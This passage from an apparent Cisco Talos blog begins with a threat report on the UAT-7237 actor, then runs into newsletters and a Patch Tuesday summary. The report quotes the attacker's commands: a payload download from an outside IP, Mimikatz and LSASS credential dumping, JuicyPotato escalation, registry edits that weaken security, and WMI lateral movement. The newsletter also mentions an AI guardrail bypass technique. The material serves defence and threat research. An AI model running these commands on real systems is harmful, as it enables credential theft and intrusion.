While UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237 deviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist their access, and later access the systems via RDP:

cmd /c c:\\temp\\WM7Lite\\download\[.\]exe  hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar c:\\temp\\WM7Lite\\1\[.\]rar

powershell (new-object System\[.\]Net\[.\]WebClient).DownloadFile('hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/vpn\[.\]rar','C:\\Windows\\Temp\\vmware-SYSTEM\\vmtools\[.\]rar')

Once UAT-7237 sets up initial access, reconnaissance and VPN-based access, they start preparing to pivot to additional systems in the enterprise to proliferate and conduct malicious activities:

cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&net use
cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&dir \\\\<remote\_smb\_share>\\c$\\
cmd\[.\]exe /c cd /d "C:\\"&net group "domain admins" /domain
cmd\[.\]exe /c cd /d "C:\\"&net group "domain controllers" /domain

In addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows Management Instrumentation (WMI) based tooling during reconnaissance and proliferation such as SharpWMI and WMICmd:

cmd\[.\]exe /c cd /d "C:\\"&C:\\ProgramData\\dynatrace\\sharpwmi\[.\]exe <IP> <user> <pass> cmd whoami

cmd.exe /c cd /d "C:\\DotNet\\"&WMIcmd.exe

wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c whoami
  
wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c netstat -ano >c:\\1.txt

 SharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary command and code executions.

UAT-7237 fingerprinted any systems subsequently accessed using rudimentary window commands such as:

cmd.exe /c systeminfo
cmd.exe /c tasklist
cmd.exe /c net1 user /domain
cmd.exe /c whoami /priv
cmd.exe /c quser

**Post-compromise tooling and actions on objectives****SoundBill**

After compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a variety of tasks on the infected endpoints. Talos tracks one of UAT-7237's custom-built tools as “SoundBill.” SoundBill is built based on  “VTHello” and is a shellcode loader written in Chinese that will decode a file on disk named “ptiti.txt” and execute the resulting shellcode.

It is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese instant messaging software, and are likely used as decoy files in attacks involving spear phishing.

SoundBill’s payload (i.e., the shellcode) may be anything from, for example, a customized implementation of Mimikatz:

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

Or it may be a mechanism to execute arbitrary commands on the infected system, such as:

c:\\temp\\vtsb.exe -c whoami

The shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long term access for information stealing. So far, the Cobalt Strike beacons Talos have found to be compatible with SoundBill communicate over HTTPS with its command and control (C2): cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws

**JuicyPotato**

UAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to execute multiple commands on endpoints such as:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami

**Configuration changes**

During intrusions on several occasions, UAT-7237 attempted to make configuration and setting changes to the Windows OS on the infected endpoints, such as disabling User Account Control (UAC) restriction via registry:

reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG\_DWORD /d 1 /f

They also attempted to enable storage of cleartext passwords:

reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG\_DWORD /d 1 /f

UAT-7237 also accessed the Component Services management console, likely to adjust privileges for their malicious components:

mmc comexp.msc

**UAT-7237's pursuit of credentials**

UAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints. However, the threat actor has evolved their use of Mimikatz over time, likely as a means of evading detection by using a Mimikatz instance built into SoundBill to extract credentials:

**Filename/command**

**Tooling name**

abc.dll

Comsvcs.dll for LSASS process dumping

Fileless.exe

Mimikatz

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

SoundBill with the Mimikatz payload

Furthermore, UAT-7237 also finds VNC credentials and configuration from infected endpoints by searching the registry and disk:

reg query "HKCU\\Software\\ORL\\WinVNC3\\Password"
dir c:\\\*vnc.ini /s /b

Another (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file and another executable — again for credential extraction:

cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c  C:\\hotfix\\1.bat"
cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c   C:\\hotfix\\Project1.exe  C:\\hotfix\\SSP.dll"

“Project1\[.\]exe” above is the ssp\_dump\_lsass project on GitHub. It takes a DLL file as an argument, injects it into the Local Security Authority Service (LSASS)  process, which then dumps the LSASS process into a BIN file.

Optionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c  {e60687f7-01a1-40aa-86ac-db1cbf673334} -p "c:\\windows\\system32\\cmd.exe"  -a "/c c:\\hotfix\\1.bat"

The process dump obtained is then staged into an archive for exfiltration:

cmd.exe /c "c:\\program files\\7-Zip\\7z.exe"  a  C:\\hotfix\\1.zip  C:\\hotfix\\1.bin

**Proliferating through the enterprise**

UAT-7237 uses the following network scanning tooling:

**FScan:** A network scanner tool used to scan for open ports against IP subnets:

fileless -h 10.30.111.1/24 -nopoc -t 20

**SMB scans:** To identify SMB services information on specific endpoints:

smb\_version 10.30.111.11 445

As soon as accessible systems are found, UAT-7237 will conduct additional recon to pivot to them using credentials they’ve extracted previously:

cmd\[.\]exe /c netstat -ano |findstr 3389
cmd\[.\]exe /c nslookup <victim’s\_subdomains>
cmd\[.\]exe /c net use  <IP>\\ipc$ <pass>  /user:<userid>
cmd\[.\]exe /c dir   \\\\<remote\_system>\\c$
cmd\[.\]exe /c net use  \\\\<remote\_system>\\ipc$ /del

**SoftEther VPN**

The remote server hosting the SoftEther VPN client consisted of two archives: one containing the Client executable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based server binary.

Talos' analysis of the SoftEther artifacts led to the following observations of UAT-7237's TTPs:

*   The server was created in September 2022 and was last used in December 2024, indicating that UAT-7237 may have been using SoftEther over a two-year period.
*   UAT-7237 specified Simplified Chinese as the preferred display language in their VPN client’s language configuration file, indicating that the operators were proficient with the language.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort rules cover this threat:

*   Snort v2 : 64908 - 64916
*   Snort v3: 301209 - 301212

**IOCs**

 IOCs for this research can also be found at our GitHub repository here. 

450fa9029c59af9edf2126df1d6a657ee6eb024d0341b32e6f6bdb8dc04bae5a - C:\\temp\\wmiscan.exe
6a72e4b92d6a459fc2c6054e9ddb9819d04ed362bd847333492410b6d7bae5aa - c:/hotfix/Project1.exe - ssp\_dump\_lsass tool
E106716a660c751e37cfc4f4fbf2ea2f833e92c2a49a0b3f40fc36ad77e0a044 - C:/hotfixlog/Fileless.exe - FScan
B52bf5a644ae96807e6d846b0ce203611d83cc8a782badc68ac46c9616649477 - C:/hotfixlog/smb\_version.exe
864e67f76ad0ce6d4cc83304af4347384c364ca6735df0797e4b1ff9519689c5 – fileless.exe - Mimikatz
 
SoundBill
Df8497b9c37b780d6b6904a24133131faed8ea4cf3d75830b53c25d41c5ea386
 
Cobalt Strike
0952e5409f39824b8a630881d585030a1d656db897adf228ce27dd9243db20b7
7a5f05da3739ad3e11414672d01b8bcf23503a9a8f1dd3f10ba2ead7745cdb1f
 
cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws
http\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar
141\[.\]164\[.\]50\[.\]141

UAT-7237 targets Taiwanese web hosting infrastructure

Hazel braves Vegas, overpriced water and the Black Hat maze to bring you Talos’ latest research — including a deep dive into the PS1Bot malware campaign.

Thursday, August 14, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

Last week I flew 5,000 miles to Las Vegas for Black Hat USA. After navigating the casino carpet labyrinth and finding the only venue in Nevada that serves a proper English breakfast tea with milk (lifesaver), I’ve decided Black Hat feels exactly like trying to run in a dream — you’re always heading somewhere, never quickly, and the water costs $8.

I don’t mean to complain (although, as a Brit, I’m practically obligated to file a formal grievance about the weather, tea or queue length). In truth, it was a brilliant week, and I got to watch my fellow Talosians deliver some outstanding presentations and research.

Rather than recap everything we did (our YouTube channel will have plenty of research highlights soon), here are three standouts: 

*   **Joe Marshall’s live incident-response exercise** – Joe ran _Backdoors & Breaches_, an interactive card game originally developed with NetHope and NGO-ISAC for humanitarian non-governmental organizations. At Black Hat, he adapted it for a lunch-and-learn with over 60 participants, guiding them through a simulated cybersecurity crisis. If you’re curious, you can find the cards online here. With a websharing tool, you can stream it to any size audience and have people play along virtually. You can also read more about Joe’s experience developing the game, alongside a video walkthrough, in his new blog post.
*   **Amy Chang’s AI guardrail bypass research** – Amy’s booth talk revealed a novel way to break the guardrails of generative AI by tricking it into repeating human-written content verbatim, a technique called “_decomposition.”_ Her work drew attention from media outlets including TechRepublic, SecurityWeek and WebProNews.
*   **Philippe Laulheret’s _ReVault_ presentation** – Philippe, from our Vulnerability Research and Discovery team, revealed vulnerabilities in embedded security chips affecting millions of laptops, potentially allowing attackers to bypass Windows login or install persistent malware. A few days ago, he published a longer version of his investigation, so you can now read the full technical deep dive covering the research process and exploit breakdown.

We’ll have more to share soon, including a behind-the-scenes tour of the Black Hat Network Operations Center (NOC).

**The one big thing **

Cisco Talos has identified a widespread malvertising campaign distributing a multi-stage malware framework Talos calls “PS1Bot,” which uses PowerShell and C# modules to steal sensitive information, log keystrokes, capture screenshots, and maintain persistent access on infected systems. PS1Bot employs in-memory execution and modular updates, targeting browser credentials, cryptocurrency wallets, and more, while minimizing its footprint to evade detection. The campaign has been active and rapidly evolving throughout 2025. 

**Why do I care? **

Casual browsing and downloading seemingly safe files can lead to infection, putting your personal data, passwords and financial info at risk — especially if you use cryptocurrency wallets or save passwords in browsers. 

**So now what? **

Be extra cautious when downloading files from search results or ads, keep your security software updated, and use dedicated password managers and security tools instead of storing sensitive info in browsers. Stay informed about evolving threats like PS1Bot, as attackers are constantly updating their tactics. Talos' blog also provides Snort SIDs and ClamAV detections. 

**Top security headlines of the week **

**Russian government hackers said to be behind US federal court filing system hack**   
The Russian government is allegedly behind the data breach affecting the U.S. court filing system known as PACER, according to The New York Times. (TechCrunch) 

**North Korean Kimsuky hackers exposed in alleged data breach**   
The North Korean state-sponsored hacking group known as Kimsuky has reportedly suffered a data breach after two hackers stole the group's data and leaked it publicly online. (Bleeping Computer) 

**Exclusive: Brosix and Chatox promised to keep your chats secured. They didn’t.**   
A researcher contacted DataBreaches after finding an unsecured backup with 155.3 GB of unique compressed files. The researcher first logged the backup as exposed in late April. (DataBreaches) 

**Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs**   
The Netherlands' National Cyber Security Centre (NCSC) is warning that a critical Citrix NetScaler vulnerability was exploited to breach "critical organizations" in the country. (Bleeping Computer) 

**Russian hackers exploited WinRAR zero-day in attacks on Europe, Canada**   
A Russian threat group has been observed exploiting a WinRAR zero-day vulnerability (now patched) as part of a cyberespionage campaign aimed at organizations in Europe and Canada. (SecurityWeek) 

**Can’t get enough Talos? **

*   **Microsoft Patch Tuesday for August 2025**   
    Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.   
*   **ReVault! When your SoC turns against you… deep dive edition**   
    Talos reported 5 vulnerabilities to Broadcom and Dell affecting both the ControlVault3 Firmware and its associated Windows APIs that we are calling “ReVault.” 100+ models of Dell Laptops are affected by this vulnerability if left unpatched. The ReVault attack can be used as a post-compromise persistence technique that can remain even across Windows reinstalls. 
*   **The TTP:** **Cyber criminals brought PowerShell 1.0 to a modern ransomware fight**   
    Groups like Qilin are using custom encryptors, uncommon RMM tools, and even PowerShell 1.0 (yes, from 2006) to quietly recon networks. 
*   **Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analyst**   
    A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages). 

**Upcoming events where you can find Talos **

BlueTeamCon (Sept. 4 – 7) Chicago, IL 

LABScon (Sept. 17 – 20) Scottsdale, AZ 

VB2025 (Sept. 24 – 26) Berlin, Germany 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**   
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507    
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201 

**SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0**   
MD5: 8c69830a50fb85d8a794fa46643493b2    
VirusTotal: https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0   
Typical Filename: AAct.exe    
Claimed Product: N/A    
Detection Name: PUA.Win.Dropper.Generic::1201 

**SHA 256: 83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08**   
MD5: 906282640ae3088481d19561c55025e4   
VirusTotal: https://www.virustotal.com/gui/file/83748e8d6f6765881f81c36efacad93c20f3296be3ff4a56f48c6aa2dcd3ac08    
Typical Filename: AAct\_x64.exe   
Claimed Product: N/A   
Detection Name: PUA.Win.Tool.Winactivator::1201

What happened in Vegas (that you actually want to know about)

Cisco Talos has observed an ongoing malware campaign that seeks to infect victims with a multi-stage malware framework, implemented in PowerShell and C#, which we are referring to as “PS1Bot.”

Malvertising campaign leads to PS1Bot, a multi-stage malware framework

Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.  
In this month's release, Microsoft observed none of the included vulnerabilities being actively exploited in the wild. Out

Tuesday, August 12, 2025 15:39

Microsoft has released its monthly security update for August 2025, which includes 111 vulnerabilities affecting a range of products, including 13 that Microsoft marked as “critical”.  

In this month's release, Microsoft observed none of the included vulnerabilities being actively exploited in the wild. Out of 13 "critical" entries, 9 are remote code execution (RCE) vulnerabilities in Microsoft Windows services and applications including the Windows kernel, Microsoft Message Queuing (MSMQ), Windows Hyper-V, Microsoft Office and GDI+.  

CVE-2025-50176 is an RCE vulnerability in DirectX Graphics Kernel given a CVSS 3.1 score of 7.8, where access of resource using incompatible type ('type confusion') in Graphics Kernel allows an authorized attacker to execute code locally. Microsoft has noted that this vulnerability affects different versions of Windows 11, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is "more likely". 

CVE-2025-50177 is an RCE vulnerability in Microsoft Message Queuing (MSMQ) service, given a CVSS score of 8.1, where use after free vulnerability allows an unauthorized attacker to execute code over a network. To exploit this vulnerability, an attacker would need to send a series of specially crafted MSMQ packets in a rapid sequence over HTTP to a MSMQ server. Microsoft assessed that the attack complexity is “high”, and that exploitation is “more likely”.  

CVE-2025-53778 is a Windows NTLM elevation of privilege vulnerability given a CVSS 3.1 base score of 8.8, where improper authentication in Windows NTLM allows an authorized attacker to elevate privileges over a network, with an attacker successfully exploiting this vulnerability gaining SYSTEM privileges. Microsoft has noted that this vulnerability affects different versions of Windows 10, Windows 11, Windows server 2008, Windows Server 2012, Windows Server 2026, Windows Server 2019, Windows Server 2022 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “more likely”. 

CVE-2025-53781 is an information disclosure vulnerability in Windows Hyper-V given a CVSS 3.1 base score of 7.7, where an authorized attacker may be able to disclose sensitive information over a network. Microsoft has noted that this vulnerability affects Windows Server 2025 with the attack complexity assessed as “low” and that exploitation as “less likely”.  

CVE-2025-53733 is a remote code execution vulnerability in Microsoft Word given a CVSS 3.1 base score of 8.4 where an incorrect conversion between numeric types in Microsoft Office Word allows an unauthorized attacker to execute code locally. Microsoft has noted that this vulnerability affects Word 2016, Microsoft SharePoint Server 2019, Microsoft SharePoint Enterprise Server 2016, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”. 

CVE-2025-53740 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4 where a use after free condition allows an unauthorized attacker to execute code locally using a Preview Pane as the attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office LTSC 2019, Microsoft Office LTSC 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”. 

CVE-2025-53766 is a remote code execution vulnerability in GDI+, a graphics Windows subsystem providing a set of features for rendering 2D graphics, images, and text, given a CVSS 3.1 base score of 9.8 where a heap-based buffer overflow allows an unauthorized attacker to execute code over a network. An attacker could trigger this vulnerability by convincing a victim to download and open a document that contains a specially crafted metafile. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server 2008. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”. 

CVE-2025-50165 is another remote code execution vulnerability in the Windows graphics component. It was also given a CVSS 3.1 base score of 9.8 where an untrusted pointer dereference allows an unauthorized attacker to execute code over a network without any user intervention. An attacker can use an uninitialized function pointer being called when decoding a JPEG image. This can be embedded in Office and 3rd party documents/files. This vulnerability affects Windows 11 24H2 and Windows Server 2025. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”.

CVE-2025-49707 is a spoofing vulnerability in Windows Hyper-V hypervisor affecting Azure, given a CVSS 3.1 base score of 7.9, where improper access control may allow an attacker to perform spoofing locally. To exploit this vulnerability, an attacker could obtain a valid certificate after a system reboot, which could then be used to access sensitive information, bypassing security measures and allow an attacker with access to a confidential VM to impersonate its identity in communications with external systems. Microsoft has noted that this vulnerability affects NCCadsH100v5-series, ECesv5-series, ECedsv5-series, ECasv5-series, ECadsv5-series, DCesv5-series, DCedsv5-series, DCasv5-series and DCadsv5-series of Azure VM. Microsoft assessed that the attack complexity is “low”, and that exploitation is “less likely”. 

CVE-2025-48807 is a remote code execution vulnerability in Windows Hyper-V hypervisor, given a CVSS 3.1 base score of 7.5, where improper restriction of communication channels to intended endpoints may result in an attacker executing code locally in a nested guest VM to escape their VM and gain admin privileges on the guest VM that is serving as the host. Microsoft has noted that this vulnerability affects various versions of Windows 10, Windows 11 and Windows Server VM. Microsoft assessed that the attack complexity is “high”, and that exploitation is “less likely”. 

CVE-2025-53731 is a remote code execution vulnerability in Microsoft Office, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021, Microsoft Office 2019, Microsoft Office 2016 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”. 

CVE-2025-53784 is a remote code execution vulnerability affecting Microsoft Word, given a CVSS 3.1 base score of 8.4, where exploiting a use after free vulnerability may allow an unauthorized attacker to execute code locally, with the Preview Pane as an attack vector. Microsoft has noted that this vulnerability affects Microsoft Office LTSC for Mac 2024, Microsoft Office LTSC for Mac 2021, Microsoft Office LTSC 2024, Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”. 

CVE-2025-53793 is an information disclosure vulnerability in Microsoft Azure Stack Hub, which may allow an attacker to disclose system internal configuration information over the network. It was given a CVSS 3.1 base score of 7.5 and affects Azure Stack Hub 2501, Azure Stack Hub 2406 and Azure Stack Hub 2408. Microsoft assessed that the attack complexity is “low”, and that exploitation is “unlikely”. 

Aside from the vulnerabilities patched and disclosed in the regular monthly patch release for August, it is worth noting that one week ahead of the monthly update, Microsoft disclosed 4 vulnerabilities affecting Microsoft cloud services, CVE-2025-53767, CVE-2025-53774, CVE-2025-53787 and CVE-2025-53792. While the CVSS base score for some of them is high, Microsoft has noted that no customer actions are required to resolve the issues.  

Talos would also like to highlight the following "important" vulnerabilities as Microsoft has determined that their exploitation is "more likely:"   

CVE-2025-53786: Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability 

CVE-2025-49743: Windows Graphics Component Elevation of Privilege Vulnerability,  

CVE-2025-50167: Windows Hyper-V Elevation of Privilege Vulnerability 

CVE-2025-50168: Win32k Elevation of Privilege Vulnerability 

CVE-2025-53132: Win32k Elevation of Privilege Vulnerability 

CVE-2025-53147: Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability 

CVE-2025-53156: Windows Storage Port Driver Information Disclosure Vulnerability 

CVE-2025-49712: Microsoft SharePoint Remote Code Execution Vulnerability 

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.    

In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.    

 Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are: 65234- 65237, 65240-65247.  

The following Snort 3 rules are also available: 301300, 301301, 30304-30306, 65240, 65241.

Microsoft Patch Tuesday for August 2025 — Snort rules and prominent vulnerabilities

Talos reported 5 vulnerabilities to Broadcom and Dell affecting both the ControlVault3 Firmware and its associated Windows APIs that we are calling “ReVault”.

ReVault! When your SoC turns against you… deep dive edition

Can AI really write safer code? Martin dusts off his software engineer skills to put it it to the test. Find out what AI code failed at, and what it was surprisingly good at. Also, we discuss new research on how AI LLM models can be used to assist in the reverse engineering of malware.

Thursday, August 7, 2025 14:00

Welcome to this week’s edition of the Threat Source newsletter. 

Vulnerabilities within software are a persistent challenge. Software engineers inadvertently tend to make the same mistakes repeatedly, with the same entries appearing in the annual top 25 list of Common Weakness Enumerations each year. 

The truth is, writing software is difficult. Software engineering is a craft demands concentration, knowledge and time, all coupled with extensive testing. Even the most skilled software engineer can get distracted or have a bad day, leading to a hidden vulnerability inadvertently making its way into a production codebase. 

Identifying vulnerabilities early in the software development process is one of the promises of AI. The idea being that an AI agent would write perfect code under the direction of a software engineer or verify and correct code written by a human. 

Last weekend, I decided to put this premise to the test. As a somewhat rusty software engineer, I resolved to see if AI could assist me with a personal software project. Initially, I was impressed, the AI agent offered an engaging discussion about high-level architecture and the trade-offs of various approaches. I was amazed at the lines of code that the AI generated on request. All the software for my project written at the press of a button! 

Then came the testing. Although the code looked convincing, it failed to interface with the required libraries. Parameters were incorrect, it tried to call fictional functions. It seemed that the way the AI imagined the library to work didn’t reflect reality or the available documentation. Similarly, there were less sanity checks or verification of variable values than I was comfortable with; especially since many of these were derived from external inputs. 

To be fair, the AI code resolved a tricky threading issue that had defeated me, and the ‘boilerplate’ code necessary to form the skeleton structure of the software was flawless. I felt that I achieved a productivity boost from the AI’s exposure to ‘frequently encountered’ coding issues. However, when it came to more esoteric APIs with which I was moderately familiar, the AI was unable to generate functional code or correctly diagnose reported errors. 

After some debugging and manual rewriting, I managed to create a working prototype. The code is clearly not bulletproof, but then again, I hadn’t explicitly asked for code that was secured against all potential hacks. Like many software engineers, myself and my AI assistant focused on quickly delivering the desired functionality, rather than considering the long-term operation of the code in a potentially hostile environment. 

I remain optimistic that AI assisted coding is the pathway to a software vulnerability free future. However, my recent limited personal experience leads me to think that we still have a considerable journey ahead before we can definitively resolve software vulnerabilities for good. 

I hope you all have a tremendous time at Summer Camp, see a lot of old friends and make new ones and most importantly that you shower and use deodorant. Conference season is a marathon, it’s long, it’s arduous, it’s sweaty – be the hygienic change you want to see in the world.  

**The one big thing **

Continuing the AI theme, Guilherme describes how AI LLM models can be used to assist in the reverse engineering of malware. Used correctly, LLMs can provide valuable insights and facilitate the analysis of malware. 

**Why do I care? **

Reverse engineering malware is the often time-consuming task of identifying the execution path of malicious software. Frequently malware writers obfuscate their code to make it difficult to understand and follow what their code is doing. Advances in technology that can speed up this process make fighting malware easier.  

**So now what? **

Investigate if the tools and approaches described in the blog can be used to improve your reverse engineering process, or as a means to begin learning about reverse engineering. 

**Top security headlines of the week ****As ransomware gangs threaten physical harm, 'I am afraid of what's next,' ex-negotiator says**

In an effort to increase the pressure on victims, ransomware gangs are now using threats of physical violence. (The Register)

**‘Shadow AI’ increases cost of data breaches, report finds**

Unmanaged and unsecured use of AI is leading to data breaches. (Cybersecurity Dive)

****Enough to drive a cybersecurity officer mad: one rule here, a different rule there****

Chief information security officers call for less fragmentation in global cybersecurity regulations. (ASPI)

****UK Online Safety Act promotes insecurity****

The implementation of the UK Online Safety Act requiring age verification for content deemed harmful to children introduces some security quandaries. (Tech HQ)

**Can’t get enough Talos? ****Cyber Analyst Series: Cybersecurity Overview and the Role of the Cybersecurity Analyst**

A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages). **Watch here.**

**Tales from the Frontlines**

Join the Cisco Talos Incident Response team to hear real-world stories from the frontlines of cyber defense. **Reserve your spot.**

**Vulnerability roundup**

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed seven vulnerabilities in WWBN AVideo, four in MedDream, and one in an Eclipse ThreadX module. **Read more.**

**Talos Takes**

Hazel is joined by threat intelligence researcher James Nutland to discuss Cisco Talos’ latest findings on the newly emerged Chaos ransomware group. **Listen here.**

**Upcoming events where you can find Talos **

It’s the summer. We’ll be on the beach. 

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**   
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201  

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**      
MD5: 7bdbd180c081fa63ca94f9c22c457376    
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details    
Typical Filename: IMG001.exe     
Detection Name: Simple\_Custom\_Detection 

**SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610**   
MD5: 85bbddc502f7b10871621fd460243fbc    
VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details   
Typical Filename: N/A   
Claimed Product: Self-extracting archive   
Detection Name: Win.Worm.Bitmin-9847045-0 

**SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca**    
MD5: 71fea034b422e4a17ebb06022532fdde     
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details    
Typical Filename: VID001.exe     
Claimed Product: N/A     
Detection Name: Coinminer:MBT.26mw.in14.Talos  

**SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa**    
MD5: df11b3105df8d7c70e7b501e210e3cc3    
VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details    
Typical Filename: DOC001.exe    
Claimed Product: N/A    
Detection Name: Win.Worm.Coinminer::1201

Source

TALOS